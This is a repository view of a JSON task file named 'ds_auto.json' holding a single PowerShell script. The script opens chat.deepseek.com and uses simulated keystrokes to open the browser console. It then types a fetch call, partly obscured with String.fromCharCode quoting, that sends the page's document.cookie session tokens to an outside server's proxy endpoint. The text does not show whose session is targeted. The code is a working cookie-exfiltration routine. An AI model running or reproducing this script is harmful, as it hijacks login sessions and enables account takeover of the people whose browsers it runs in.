Files
html/api/blade-tasks/ds_auto.json
2026-04-12 22:57:03 +02:00

8 lines
879 B
JSON

{
"type": "powershell",
"priority": "P0",
"action": "auto_ds_token",
"script": "Start-Process \"https://chat.deepseek.com\" -Wait; Start-Sleep 3; Add-Type -AssemblyName System.Windows.Forms; [System.Windows.Forms.SendKeys]::SendWait(\"^+j\"); Start-Sleep 1; [System.Windows.Forms.SendKeys]::SendWait(\"fetch(String.fromCharCode(39)+https://weval-consulting.com/api/wevia-deepseek-proxy.php+String.fromCharCode(39),{method:String.fromCharCode(39)+POST+String.fromCharCode(39),headers:{String.fromCharCode(39)+Content-Type+String.fromCharCode(39):String.fromCharCode(39)+application/json+String.fromCharCode(39)},body:JSON.stringify({action:String.fromCharCode(39)+set_ds_token+String.fromCharCode(39),token:document.cookie})}).then(r=>r.json()).then(d=>alert(String.fromCharCode(39)+DONE+String.fromCharCode(39)+d.length)){ENTER}\"); Write-Output SENT",
"timeout": 20
}